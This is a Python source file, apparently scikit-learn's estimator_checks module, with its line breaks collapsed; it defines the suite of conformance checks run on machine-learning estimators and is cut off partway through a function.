import types import warnings import sys import traceback import pickle import re from copy import deepcopy from functools import partial, wraps from inspect import signature import numpy as np from scipy import sparse from scipy.stats import rankdata import joblib from . import IS_PYPY from .. import config_context from ._testing import assert_raises, _get_args from ._testing import assert_raises_regex from ._testing import assert_raise_message from ._testing import assert_array_equal from ._testing import assert_array_almost_equal from ._testing import assert_allclose from ._testing import assert_allclose_dense_sparse from ._testing import assert_warns_message from ._testing import set_random_state from ._testing import SkipTest from ._testing import ignore_warnings from ._testing import create_memmap_backed_data from . import is_scalar_nan from ..discriminant_analysis import LinearDiscriminantAnalysis from ..linear_model import Ridge from ..base import ( clone, ClusterMixin, is_classifier, is_regressor, is_outlier_detector, RegressorMixin, ) from ..metrics import accuracy_score, adjusted_rand_score, f1_score from ..random_projection import BaseRandomProjection from ..feature_selection import SelectKBest from ..pipeline import make_pipeline from ..exceptions import DataConversionWarning from ..exceptions import NotFittedError from ..exceptions import SkipTestWarning from ..model_selection import train_test_split from ..model_selection import ShuffleSplit from ..model_selection._validation import _safe_split from ..metrics.pairwise import (rbf_kernel, linear_kernel, pairwise_distances) from .import shuffle from .validation import has_fit_parameter, _num_samples from ..preprocessing import StandardScaler from ..preprocessing import scale from ..datasets import ( load_iris, make_blobs, make_multilabel_classification, make_regression, ) REGRESSION_DATASET = None CROSS_DECOMPOSITION = ['PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD'] def _yield_checks(estimator): name = estimator.__class__.__name__ tags = estimator._get_tags() yield check_no_attributes_set_in_init yield check_estimators_dtypes yield check_fit_score_takes_y yield check_sample_weights_pandas_series yield check_sample_weights_not_an_array yield check_sample_weights_list yield check_sample_weights_shape if (has_fit_parameter(estimator, "sample_weight") and not (hasattr(estimator, "_pairwise") and estimator._pairwise)): # We skip pairwise because the data is not pairwise yield partial(check_sample_weights_invariance, kind='ones') yield partial(check_sample_weights_invariance, kind='zeros') yield check_estimators_fit_returns_self yield partial(check_estimators_fit_returns_self, readonly_memmap=True) # Check that all estimator yield informative messages when # trained on empty datasets if not tags["no_validation"]: yield check_complex_data yield check_dtype_object yield check_estimators_empty_data_messages if name not in CROSS_DECOMPOSITION: # cross-decomposition's "transform" returns X and Y yield check_pipeline_consistency if not tags["allow_nan"] and not tags["no_validation"]: # Test that all estimators check their input for NaN's and infs yield check_estimators_nan_inf if _is_pairwise(estimator): # Check that pairwise estimator throws error on non-square input yield check_nonsquare_error yield check_estimators_overwrite_params if hasattr(estimator, 'sparsify'): yield check_sparsify_coefficients yield check_estimator_sparse_data # Test that estimators can be pickled, and once pickled # give the same answer as before. yield check_estimators_pickle def _yield_classifier_checks(classifier): tags = classifier._get_tags() # test classifiers can handle non-array data and pandas objects yield check_classifier_data_not_an_array # test classifiers trained on a single label always return this label yield check_classifiers_one_label yield check_classifiers_classes yield check_estimators_partial_fit_n_features if tags["multioutput"]: yield check_classifier_multioutput # basic consistency testing yield check_classifiers_train yield partial(check_classifiers_train, readonly_memmap=True) yield partial(check_classifiers_train, readonly_memmap=True, X_dtype='float32') yield check_classifiers_regression_target if tags["multilabel"]: yield check_classifiers_multilabel_representation_invariance if not tags["no_validation"]: yield check_supervised_y_no_nan yield check_supervised_y_2d if tags["requires_fit"]: yield check_estimators_unfitted if 'class_weight' in classifier.get_params().keys(): yield check_class_weight_classifiers yield check_non_transformer_estimators_n_iter # test if predict_proba is a monotonic transformation of decision_function yield check_decision_proba_consistency @ignore_warnings(category=FutureWarning) def check_supervised_y_no_nan(name, estimator_orig, strict_mode=True): # Checks that the Estimator targets are not NaN. estimator = clone(estimator_orig) rng = np.random.RandomState(888) X = rng.randn(10, 5) y = np.full(10, np.inf) y = _enforce_estimator_tags_y(estimator, y) errmsg = "Input contains NaN, infinity or a value too large for " \ "dtype('float64')." try: estimator.fit(X, y) except ValueError as e: if str(e) != errmsg: raise ValueError("Estimator {0} raised error as expected, but " "does not match expected error message" .format(name)) else: raise ValueError("Estimator {0} should have raised error on fitting " "array y with NaN value.".format(name)) def _yield_regressor_checks(regressor): tags = regressor._get_tags() # TODO: test with intercept # TODO: test with multiple responses # basic testing yield check_regressors_train yield partial(check_regressors_train, readonly_memmap=True) yield partial(check_regressors_train, readonly_memmap=True, X_dtype='float32') yield check_regressor_data_not_an_array yield check_estimators_partial_fit_n_features if tags["multioutput"]: yield check_regressor_multioutput yield check_regressors_no_decision_function if not tags["no_validation"]: yield check_supervised_y_2d yield check_supervised_y_no_nan name = regressor.__class__.__name__ if name != 'CCA': # check that the regressor handles int input yield check_regressors_int if tags["requires_fit"]: yield check_estimators_unfitted yield check_non_transformer_estimators_n_iter def _yield_transformer_checks(transformer): tags = transformer._get_tags() # All transformers should either deal with sparse data or raise an # exception with type TypeError and an intelligible error message if not tags["no_validation"]: yield check_transformer_data_not_an_array # these don't actually fit the data, so don't raise errors yield check_transformer_general if tags["preserves_dtype"]: yield check_transformer_preserve_dtypes yield partial(check_transformer_general, readonly_memmap=True) if not transformer._get_tags()["stateless"]: yield check_transformers_unfitted # Dependent on external solvers and hence accessing the iter # param is non-trivial. external_solver = ['Isomap', 'KernelPCA', 'LocallyLinearEmbedding', 'RandomizedLasso', 'LogisticRegressionCV'] name = transformer.__class__.__name__ if name not in external_solver: yield check_transformer_n_iter def _yield_clustering_checks(clusterer): yield check_clusterer_compute_labels_predict name = clusterer.__class__.__name__ if name not in ('WardAgglomeration', "FeatureAgglomeration"): # this is clustering on the features # let's not test that here. yield check_clustering yield partial(check_clustering, readonly_memmap=True) yield check_estimators_partial_fit_n_features yield check_non_transformer_estimators_n_iter def _yield_outliers_checks(estimator): # checks for outlier detectors that have a fit_predict method if hasattr(estimator, 'fit_predict'): yield check_outliers_fit_predict # checks for estimators that can be used on a test set if hasattr(estimator, 'predict'): yield check_outliers_train yield partial(check_outliers_train, readonly_memmap=True) # test outlier detectors can handle non-array data yield check_classifier_data_not_an_array # test if NotFittedError is raised if estimator._get_tags()["requires_fit"]: yield check_estimators_unfitted def _yield_all_checks(estimator): name = estimator.__class__.__name__ tags = estimator._get_tags() if "2darray" not in tags["X_types"]: warnings.warn("Can't test estimator {} which requires input " " of type {}".format(name, tags["X_types"]), SkipTestWarning) return if tags["_skip_test"]: warnings.warn("Explicit SKIP via _skip_test tag for estimator " "{}.".format(name), SkipTestWarning) return for check in _yield_checks(estimator): yield check if is_classifier(estimator): for check in _yield_classifier_checks(estimator): yield check if is_regressor(estimator): for check in _yield_regressor_checks(estimator): yield check if hasattr(estimator, 'transform'): for check in _yield_transformer_checks(estimator): yield check if isinstance(estimator, ClusterMixin): for check in _yield_clustering_checks(estimator): yield check if is_outlier_detector(estimator): for check in _yield_outliers_checks(estimator): yield check yield check_parameters_default_constructible yield check_fit2d_predict1d yield check_methods_subset_invariance yield check_fit2d_1sample yield check_fit2d_1feature yield check_fit1d yield check_get_params_invariance yield check_set_params yield check_dict_unchanged yield check_dont_overwrite_parameters yield check_fit_idempotent if not tags["no_validation"]: yield check_n_features_in if tags["requires_y"]: yield check_requires_y_none if tags["requires_positive_X"]: yield check_fit_non_negative def _get_check_estimator_ids(obj): """Create pytest ids for checks. When `obj` is an estimator, this returns the pprint version of the estimator (with `print_changed_only=True`). When `obj` is a function, the name of the function is returned with its keyworld arguments. `_get_check_estimator_ids` is designed to be used as the `id` in `pytest.mark.parametrize` where `check_estimator(..., generate_only=True)` is yielding estimators and checks. Parameters ---------- obj : estimator or function Items generated by `check_estimator`. Returns ------- id : str or None See Also -------- check_estimator """ if callable(obj): if not isinstance(obj, partial): return obj.__name__ if not obj.keywords: return obj.func.__name__ kwstring = ",".join(["{}={}".format(k, v) for k, v in obj.keywords.items()]) return "{}({})".format(obj.func.__name__, kwstring) if hasattr(obj, "get_params"): with config_context(print_changed_only=True): return re.sub(r"\s", "", str(obj)) def _construct_instance(Estimator): """Construct Estimator instance if possible.""" required_parameters = getattr(Estimator, "_required_parameters", []) if len(required_parameters): if required_parameters in (["estimator"], ["base_estimator"]): if issubclass(Estimator, RegressorMixin): estimator = Estimator(Ridge()) else: estimator = Estimator(LinearDiscriminantAnalysis()) else: raise SkipTest("Can't instantiate estimator {} which requires " "parameters {}".format(Estimator.__name__, required_parameters)) else: estimator = Estimator() return estimator def _maybe_mark_xfail(estimator, check, strict_mode, pytest): # Mark (estimator, check) pairs as XFAIL if needed (see conditions in # _should_be_skipped_or_marked()) # This is similar to _maybe_skip(), but this one is used by # @parametrize_with_checks() instead of check_estimator() should_be_marked, reason = _should_be_skipped_or_marked(estimator, check, strict_mode) if not should_be_marked: return estimator, check else: return pytest.param(estimator, check, marks=pytest.mark.xfail(reason=reason)) def _maybe_skip(estimator, check, strict_mode): # Wrap a check so that it's skipped if needed (see conditions in # _should_be_skipped_or_marked()) # This is similar to _maybe_mark_xfail(), but this one is used by # check_estimator() instead of @parametrize_with_checks which requires # pytest should_be_skipped, reason = _should_be_skipped_or_marked(estimator, check, strict_mode) if not should_be_skipped: return check check_name = (check.func.__name__ if isinstance(check, partial) else check.__name__) @wraps(check) def wrapped(*args, **kwargs): raise SkipTest( f"Skipping {check_name} for {estimator.__class__.__name__}: " f"{reason}" ) return wrapped def _should_be_skipped_or_marked(estimator, check, strict_mode): # Return whether a check should be skipped (when using check_estimator()) # or marked as XFAIL (when using @parametrize_with_checks()), along with a # reason. # A check should be skipped or marked if either: # - the check is in the _xfail_checks tag of the estimator # - the check is fully strict and strict mode is off # Checks that are only partially strict will not be skipped since we want # to run their non-strict parts. check_name = (check.func.__name__ if isinstance(check, partial) else check.__name__) xfail_checks = estimator._get_tags()['_xfail_checks'] or {} if check_name in xfail_checks: return True, xfail_checks[check_name] if check_name in _FULLY_STRICT_CHECKS and not strict_mode: return True, f'{check_name} is fully strict and strict mode is off' return False, 'placeholder reason that will never be used' def parametrize_with_checks(estimators, strict_mode=True): """Pytest specific decorator for parametrizing estimator checks. The `id` of each check is set to be a pprint version of the estimator and the name of the check with its keyword arguments. This allows to use `pytest -k` to specify which tests to run:: pytest test_check_estimators.py -k check_estimators_fit_returns_self Parameters ---------- estimators : list of estimators instances Estimators to generated checks for. .. versionchanged:: 0.24 Passing a class was deprecated in version 0.23, and support for classes was removed in 0.24. Pass an instance instead. strict_mode : bool, default=True If True, the full check suite is run. If False, only the non-strict part of the check suite is run. In non-strict mode, some checks will be easier to pass: e.g., they will only make sure an error is raised instead of also checking the full error message. Some checks are considered completely strict, in which case they are treated as if they were in the estimators' `_xfails_checks` tag: they will be marked as `xfail` for pytest. See :ref:`estimator_tags` for more info on the `_xfails_check` tag. The set of strict checks is in `sklearn.utils.estimator_checks._FULLY_STRICT_CHECKS`. .. versionadded:: 0.24 Returns ------- decorator : `pytest.mark.parametrize` Examples -------- >>> from sklearn.utils.estimator_checks import parametrize_with_checks >>> from sklearn.linear_model import LogisticRegression >>> from sklearn.tree import DecisionTreeRegressor >>> @parametrize_with_checks([LogisticRegression(), ... DecisionTreeRegressor()]) ... def test_sklearn_compatible_estimator(estimator, check): ... check(estimator) """ import pytest if any(isinstance(est, type) for est in estimators): msg = ("Passing a class was deprecated in version 0.23 " "and isn't supported anymore from 0.24." "Please pass an instance instead.") raise TypeError(msg) def checks_generator(): for estimator in estimators: name = type(estimator).__name__ for check in _yield_all_checks(estimator): check = partial(check, name, strict_mode=strict_mode) yield _maybe_mark_xfail(estimator, check, strict_mode, pytest) return pytest.mark.parametrize("estimator, check", checks_generator(), ids=_get_check_estimator_ids) def check_estimator(Estimator, generate_only=False, strict_mode=True): """Check if estimator adheres to scikit-learn conventions. This estimator will run an extensive test-suite for input validation, shapes, etc, making sure that the estimator complies with `scikit-learn` conventions as detailed in :ref:`rolling_your_own_estimator`. Additional tests for classifiers, regressors, clustering or transformers will be run if the Estimator class inherits from the corresponding mixin from sklearn.base. Setting `generate_only=True` returns a generator that yields (estimator, check) tuples where the check can be called independently from each other, i.e. `check(estimator)`. This allows all checks to be run independently and report the checks that are failing. scikit-learn provides a pytest specific decorator, :func:`~sklearn.utils.parametrize_with_checks`, making it easier to test multiple estimators. Parameters ---------- estimator : estimator object Estimator instance to check. .. versionchanged:: 0.24 Passing a class was deprecated in version 0.23, and support for classes was removed in 0.24. generate_only : bool, default=False When `False`, checks are evaluated when `check_estimator` is called. When `True`, `check_estimator` returns a generator that yields (estimator, check) tuples. The check is run by calling `check(estimator)`. .. versionadded:: 0.22 strict_mode : bool, default=True If True, the full check suite is run. If False, only the non-strict part of the check suite is run. In non-strict mode, some checks will be easier to pass: e.g., they will only make sure an error is raised instead of also checking the full error message. Some checks are considered completely strict, in which case they are treated as if they were in the estimators' `_xfails_checks` tag: they will be ignored with a warning. See :ref:`estimator_tags` for more info on the `_xfails_check` tag. The set of strict checks is in `sklearn.utils.estimator_checks._FULLY_STRICT_CHECKS`. .. versionadded:: 0.24 Returns ------- checks_generator : generator Generator that yields (estimator, check) tuples. Returned when `generate_only=True`. """ if isinstance(Estimator, type): msg = ("Passing a class was deprecated in version 0.23 " "and isn't supported anymore from 0.24." "Please pass an instance instead.") raise TypeError(msg) estimator = Estimator name = type(estimator).__name__ def checks_generator(): for check in _yield_all_checks(estimator): check = _maybe_skip(estimator, check, strict_mode) yield estimator, partial(check, name, strict_mode=strict_mode) if generate_only: return checks_generator() for estimator, check in checks_generator(): try: check(estimator) except SkipTest as exception: # SkipTest is thrown when pandas can't be imported, or by checks # that are in the xfail_checks tag warnings.warn(str(exception), SkipTestWarning) def _regression_dataset(): global REGRESSION_DATASET if REGRESSION_DATASET is None: X, y = make_regression( n_samples=200, n_features=10, n_informative=1, bias=5.0, noise=20, random_state=42, ) X = StandardScaler().fit_transform(X) REGRESSION_DATASET = X, y return REGRESSION_DATASET def _set_checking_parameters(estimator): # set parameters to speed up some estimators and # avoid deprecated behaviour params = estimator.get_params() name = estimator.__class__.__name__ if ("n_iter" in params and name != "TSNE"): estimator.set_params(n_iter=5) if "max_iter" in params: if estimator.max_iter is not None: estimator.set_params(max_iter=min(5, estimator.max_iter)) # LinearSVR, LinearSVC if estimator.__class__.__name__ in ['LinearSVR', 'LinearSVC']: estimator.set_params(max_iter=20) # NMF if estimator.__class__.__name__ == 'NMF': estimator.set_params(max_iter=100) # MLP if estimator.__class__.__name__ in ['MLPClassifier', 'MLPRegressor']: estimator.set_params(max_iter=100) if "n_resampling" in params: # randomized lasso estimator.set_params(n_resampling=5) if "n_estimators" in params: estimator.set_params(n_estimators=min(5, estimator.n_estimators)) if "max_trials" in params: # RANSAC estimator.set_params(max_trials=10) if "n_init" in params: # K-Means estimator.set_params(n_init=2) if name == 'TruncatedSVD': # TruncatedSVD doesn't run with n_components = n_features # This is ugly :-/ estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = min(estimator.n_clusters, 2) if hasattr(estimator, "n_best"): estimator.n_best = 1 if name == "SelectFdr": # be tolerant of noisy datasets (not actually speed) estimator.set_params(alpha=.5) if name == "TheilSenRegressor": estimator.max_subpopulation = 100 if isinstance(estimator, BaseRandomProjection): # Due to the jl lemma and often very few samples, the number # of components of the random matrix projection will be probably # greater than the number of features. # So we impose a smaller number (avoid "auto" mode) estimator.set_params(n_components=2) if isinstance(estimator, SelectKBest): # SelectKBest has a default of k=10 # which is more feature than we have in most case. estimator.set_params(k=1) if name in ('HistGradientBoostingClassifier', 'HistGradientBoostingRegressor'): # The default min_samples_leaf (20) isn't appropriate for small # datasets (only very shallow trees are built) that the checks use. estimator.set_params(min_samples_leaf=5) if name == 'DummyClassifier': # the default strategy prior would output constant predictions and fail # for check_classifiers_predictions estimator.set_params(strategy='stratified') # Speed-up by reducing the number of CV or splits for CV estimators loo_cv = ['RidgeCV'] if name not in loo_cv and hasattr(estimator, 'cv'): estimator.set_params(cv=3) if hasattr(estimator, 'n_splits'): estimator.set_params(n_splits=3) if name == 'OneHotEncoder': estimator.set_params(handle_unknown='ignore') class _NotAnArray: """An object that is convertible to an array. Parameters ---------- data : array-like The data. """ def __init__(self, data): self.data = np.asarray(data) def __array__(self, dtype=None): return self.data def __array_function__(self, func, types, args, kwargs): if func.__name__ == "may_share_memory": return True raise TypeError("Don't want to call array_function {}!".format( func.__name__)) def _is_pairwise(estimator): """Returns True if estimator has a _pairwise attribute set to True. Parameters ---------- estimator : object Estimator object to test. Returns ------- out : bool True if _pairwise is set to True and False otherwise. """ return bool(getattr(estimator, "_pairwise", False)) def _is_pairwise_metric(estimator): """Returns True if estimator accepts pairwise metric. Parameters ---------- estimator : object Estimator object to test. Returns ------- out : bool True if _pairwise is set to True and False otherwise. """ metric = getattr(estimator, "metric", None) return bool(metric == 'precomputed') def _pairwise_estimator_convert_X(X, estimator, kernel=linear_kernel): if _is_pairwise_metric(estimator): return pairwise_distances(X, metric='euclidean') if _is_pairwise(estimator): return kernel(X, X) return X def _generate_sparse_matrix(X_csr): """Generate sparse matrices with {32,64}bit indices of diverse format. Parameters ---------- X_csr: CSR Matrix Input matrix in CSR format. Returns ------- out: iter(Matrices) In format['dok', 'lil', 'dia', 'bsr', 'csr', 'csc', 'coo', 'coo_64', 'csc_64', 'csr_64'] """ assert X_csr.format == 'csr' yield 'csr', X_csr.copy() for sparse_format in ['dok', 'lil', 'dia', 'bsr', 'csc', 'coo']: yield sparse_format, X_csr.asformat(sparse_format) # Generate large indices matrix only if its supported by scipy X_coo = X_csr.asformat('coo') X_coo.row = X_coo.row.astype('int64') X_coo.col = X_coo.col.astype('int64') yield "coo_64", X_coo for sparse_format in ['csc', 'csr']: X = X_csr.asformat(sparse_format) X.indices = X.indices.astype('int64') X.indptr = X.indptr.astype('int64') yield sparse_format + "_64", X def check_estimator_sparse_data(name, estimator_orig, strict_mode=True): rng = np.random.RandomState(0) X = rng.rand(40, 10) X[X < .8] = 0 X = _pairwise_estimator_convert_X(X, estimator_orig) X_csr = sparse.csr_matrix(X) y = (4 * rng.rand(40)).astype(int) # catch deprecation warnings with ignore_warnings(category=FutureWarning): estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) tags = estimator_orig._get_tags() for matrix_format, X in _generate_sparse_matrix(X_csr): # catch deprecation warnings with ignore_warnings(category=FutureWarning): estimator = clone(estimator_orig) if name in ['Scaler', 'StandardScaler']: estimator.set_params(with_mean=False) # fit and predict try: with ignore_warnings(category=FutureWarning): estimator.fit(X, y) if hasattr(estimator, "predict"): pred = estimator.predict(X) if tags['multioutput_only']: assert pred.shape == (X.shape[0], 1) else: assert pred.shape == (X.shape[0],) if hasattr(estimator, 'predict_proba'): probs = estimator.predict_proba(X) if tags['binary_only']: expected_probs_shape = (X.shape[0], 2) else: expected_probs_shape = (X.shape[0], 4) assert probs.shape == expected_probs_shape except (TypeError, ValueError) as e: if 'sparse' not in repr(e).lower(): if "64" in matrix_format: msg = ("Estimator %s doesn't seem to support %s matrix, " "and is not failing gracefully, e.g. by using " "check_array(X, accept_large_sparse=False)") raise AssertionError(msg % (name, matrix_format)) else: print("Estimator %s doesn't seem to fail gracefully on " "sparse data: error message state explicitly that " "sparse input is not supported if this is not" " the case." % name) raise except Exception: print("Estimator %s doesn't seem to fail gracefully on " "sparse data: it should raise a TypeError if sparse input " "is explicitly not supported." % name) raise @ignore_warnings(category=FutureWarning) def check_sample_weights_pandas_series(name, estimator_orig, strict_mode=True): # check that estimators will accept a 'sample_weight' parameter of # type pandas.Series in the 'fit' function. estimator = clone(estimator_orig) if has_fit_parameter(estimator, "sample_weight"): try: import pandas as pd X = np.array([[1, 1], [1, 2], [1, 3], [1, 4], [2, 1], [2, 2], [2, 3], [2, 4], [3, 1], [3, 2], [3, 3], [3, 4]]) X = pd.DataFrame(_pairwise_estimator_convert_X(X, estimator_orig)) y = pd.Series([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 2, 2]) weights = pd.Series([1] * 12) if estimator._get_tags()["multioutput_only"]: y = pd.DataFrame(y) try: estimator.fit(X, y, sample_weight=weights) except ValueError: raise ValueError("Estimator {0} raises error if " "'sample_weight' parameter is of " "type pandas.Series".format(name)) except ImportError: raise SkipTest("pandas is not installed: not testing for " "input of type pandas.Series to class weight.") @ignore_warnings(category=(FutureWarning)) def check_sample_weights_not_an_array(name, estimator_orig, strict_mode=True): # check that estimators will accept a 'sample_weight' parameter of # type _NotAnArray in the 'fit' function. estimator = clone(estimator_orig) if has_fit_parameter(estimator, "sample_weight"): X = np.array([[1, 1], [1, 2], [1, 3], [1, 4], [2, 1], [2, 2], [2, 3], [2, 4], [3, 1], [3, 2], [3, 3], [3, 4]]) X = _NotAnArray(_pairwise_estimator_convert_X(X, estimator_orig)) y = _NotAnArray([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 2, 2]) weights = _NotAnArray([1] * 12) if estimator._get_tags()["multioutput_only"]: y = _NotAnArray(y.data.reshape(-1, 1)) estimator.fit(X, y, sample_weight=weights) @ignore_warnings(category=(FutureWarning)) def check_sample_weights_list(name, estimator_orig, strict_mode=True): # check that estimators will accept a 'sample_weight' parameter of # type list in the 'fit' function. if has_fit_parameter(estimator_orig, "sample_weight"): estimator = clone(estimator_orig) rnd = np.random.RandomState(0) n_samples = 30 X = _pairwise_estimator_convert_X(rnd.uniform(size=(n_samples, 3)), estimator_orig) y = np.arange(n_samples) % 3 y = _enforce_estimator_tags_y(estimator, y) sample_weight = [3] * n_samples # Test that estimators don't raise any exception estimator.fit(X, y, sample_weight=sample_weight) @ignore_warnings(category=FutureWarning) def check_sample_weights_shape(name, estimator_orig, strict_mode=True): # check that estimators raise an error if sample_weight # shape mismatches the input if (has_fit_parameter(estimator_orig, "sample_weight") and not (hasattr(estimator_orig, "_pairwise") and estimator_orig._pairwise)): estimator = clone(estimator_orig) X = np.array([[1, 3], [1, 3], [1, 3], [1, 3], [2, 1], [2, 1], [2, 1], [2, 1], [3, 3], [3, 3], [3, 3], [3, 3], [4, 1], [4, 1], [4, 1], [4, 1]]) y = np.array([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2]) y = _enforce_estimator_tags_y(estimator, y) estimator.fit(X, y, sample_weight=np.ones(len(y))) assert_raises(ValueError, estimator.fit, X, y, sample_weight=np.ones(2*len(y))) assert_raises(ValueError, estimator.fit, X, y, sample_weight=np.ones((len(y), 2))) @ignore_warnings(category=FutureWarning) def check_sample_weights_invariance(name, estimator_orig, kind="ones", strict_mode=True): # For kind="ones" check that the estimators yield same results for # unit weights and no weights # For kind="zeros" check that setting sample_weight to 0 is equivalent # to removing corresponding samples. estimator1 = clone(estimator_orig) estimator2 = clone(estimator_orig) set_random_state(estimator1, random_state=0) set_random_state(estimator2, random_state=0) X1 = np.array([[1, 3], [1, 3], [1, 3], [1, 3], [2, 1], [2, 1], [2, 1], [2, 1], [3, 3], [3, 3], [3, 3], [3, 3], [4, 1], [4, 1], [4, 1], [4, 1]], dtype=np.float64) y1 = np.array([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2], dtype=int) if kind == 'ones': X2 = X1 y2 = y1 sw2 = np.ones(shape=len(y1)) err_msg = (f"For {name} sample_weight=None is not equivalent to " f"sample_weight=ones") elif kind == 'zeros': # Construct a dataset that is very different to (X, y) if weights # are disregarded, but identical to (X, y) given weights. X2 = np.vstack([X1, X1 + 1]) y2 = np.hstack([y1, 3 - y1]) sw2 = np.ones(shape=len(y1) * 2) sw2[len(y1):] = 0 X2, y2, sw2 = shuffle(X2, y2, sw2, random_state=0) err_msg = (f"For {name}, a zero sample_weight is not equivalent " f"to removing the sample") else: # pragma: no cover raise ValueError y1 = _enforce_estimator_tags_y(estimator1, y1) y2 = _enforce_estimator_tags_y(estimator2, y2) estimator1.fit(X1, y=y1, sample_weight=None) estimator2.fit(X2, y=y2, sample_weight=sw2) for method in ["predict", "predict_proba", "decision_function", "transform"]: if hasattr(estimator_orig, method): X_pred1 = getattr(estimator1, method)(X1) X_pred2 = getattr(estimator2, method)(X1) assert_allclose_dense_sparse(X_pred1, X_pred2, err_msg=err_msg) @ignore_warnings(category=(FutureWarning, UserWarning)) def check_dtype_object(name, estimator_orig, strict_mode=True): # check that estimators treat dtype object as numeric if possible rng = np.random.RandomState(0) X = _pairwise_estimator_convert_X(rng.rand(40, 10), estimator_orig) X = X.astype(object) tags = estimator_orig._get_tags() y = (X[:, 0] * 4).astype(int) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) estimator.fit(X, y) if hasattr(estimator, "predict"): estimator.predict(X) if hasattr(estimator, "transform"): estimator.transform(X) try: estimator.fit(X, y.astype(object)) except Exception as e: if "Unknown label type" not in str(e): raise if 'string' not in tags['X_types']: X[0, 0] = {'foo': 'bar'} msg = "argument must be a string.* number" assert_raises_regex(TypeError, msg, estimator.fit, X, y) else: # Estimators supporting string will not call np.asarray to convert the # data to numeric and therefore, the error will not be raised. # Checking for each element dtype in the input array will be costly. # Refer to #11401 for full discussion. estimator.fit(X, y) def check_complex_data(name, estimator_orig, strict_mode=True): # check that estimators raise an exception on providing complex data X = np.random.sample(10) + 1j * np.random.sample(10) X = X.reshape(-1, 1) y = np.random.sample(10) + 1j * np.random.sample(10) estimator = clone(estimator_orig) assert_raises_regex(ValueError, "Complex data not supported", estimator.fit, X, y) @ignore_warnings def check_dict_unchanged(name, estimator_orig, strict_mode=True): # this estimator raises # ValueError: Found array with 0 feature(s) (shape=(23, 0)) # while a minimum of 1 is required. # error if name in ['SpectralCoclustering']: return rnd = np.random.RandomState(0) if name in ['RANSACRegressor']: X = 3 * rnd.uniform(size=(20, 3)) else: X = 2 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 if hasattr(estimator, "n_best"): estimator.n_best = 1 set_random_state(estimator, 1) estimator.fit(X, y) for method in ["predict", "transform", "decision_function", "predict_proba"]: if hasattr(estimator, method): dict_before = estimator.__dict__.copy() getattr(estimator, method)(X) assert estimator.__dict__ == dict_before, ( 'Estimator changes __dict__ during %s' % method) def _is_public_parameter(attr): return not (attr.startswith('_') or attr.endswith('_')) @ignore_warnings(category=FutureWarning) def check_dont_overwrite_parameters(name, estimator_orig, strict_mode=True): # check that fit method only changes or sets private attributes if hasattr(estimator_orig.__init__, "deprecated_original"): # to not check deprecated classes return estimator = clone(estimator_orig) rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) dict_before_fit = estimator.__dict__.copy() estimator.fit(X, y) dict_after_fit = estimator.__dict__ public_keys_after_fit = [key for key in dict_after_fit.keys() if _is_public_parameter(key)] attrs_added_by_fit = [key for key in public_keys_after_fit if key not in dict_before_fit.keys()] # check that fit doesn't add any public attribute assert not attrs_added_by_fit, ( 'Estimator adds public attribute(s) during' ' the fit method.' ' Estimators are only allowed to add private attributes' ' either started with _ or ended' ' with _ but %s added' % ', '.join(attrs_added_by_fit)) # check that fit doesn't change any public attribute attrs_changed_by_fit = [key for key in public_keys_after_fit if (dict_before_fit[key] is not dict_after_fit[key])] assert not attrs_changed_by_fit, ( 'Estimator changes public attribute(s) during' ' the fit method. Estimators are only allowed' ' to change attributes started' ' or ended with _, but' ' %s changed' % ', '.join(attrs_changed_by_fit)) @ignore_warnings(category=FutureWarning) def check_fit2d_predict1d(name, estimator_orig, strict_mode=True): # check by fitting a 2d array and predicting with a 1d array rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) tags = estimator_orig._get_tags() estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) estimator.fit(X, y) if tags["no_validation"]: # FIXME this is a bit loose return for method in ["predict", "transform", "decision_function", "predict_proba"]: if hasattr(estimator, method): assert_raise_message(ValueError, "Reshape your data", getattr(estimator, method), X[0]) def _apply_on_subsets(func, X): # apply function on the whole set and on mini batches result_full = func(X) n_features = X.shape[1] result_by_batch = [func(batch.reshape(1, n_features)) for batch in X] # func can output tuple (e.g. score_samples) if type(result_full) == tuple: result_full = result_full[0] result_by_batch = list(map(lambda x: x[0], result_by_batch)) if sparse.issparse(result_full): result_full = result_full.A result_by_batch = [x.A for x in result_by_batch] return np.ravel(result_full), np.ravel(result_by_batch) @ignore_warnings(category=FutureWarning) def check_methods_subset_invariance(name, estimator_orig, strict_mode=True): # check that method gives invariant results if applied # on mini batches or the whole set rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) estimator.fit(X, y) for method in ["predict", "transform", "decision_function", "score_samples", "predict_proba"]: msg = ("{method} of {name} is not invariant when applied " "to a subset.").format(method=method, name=name) if hasattr(estimator, method): result_full, result_by_batch = _apply_on_subsets( getattr(estimator, method), X) assert_allclose(result_full, result_by_batch, atol=1e-7, err_msg=msg) @ignore_warnings def check_fit2d_1sample(name, estimator_orig, strict_mode=True): # Check that fitting a 2d array with only one sample either works or # returns an informative message. The error message should either mention # the number of samples or the number of classes. rnd = 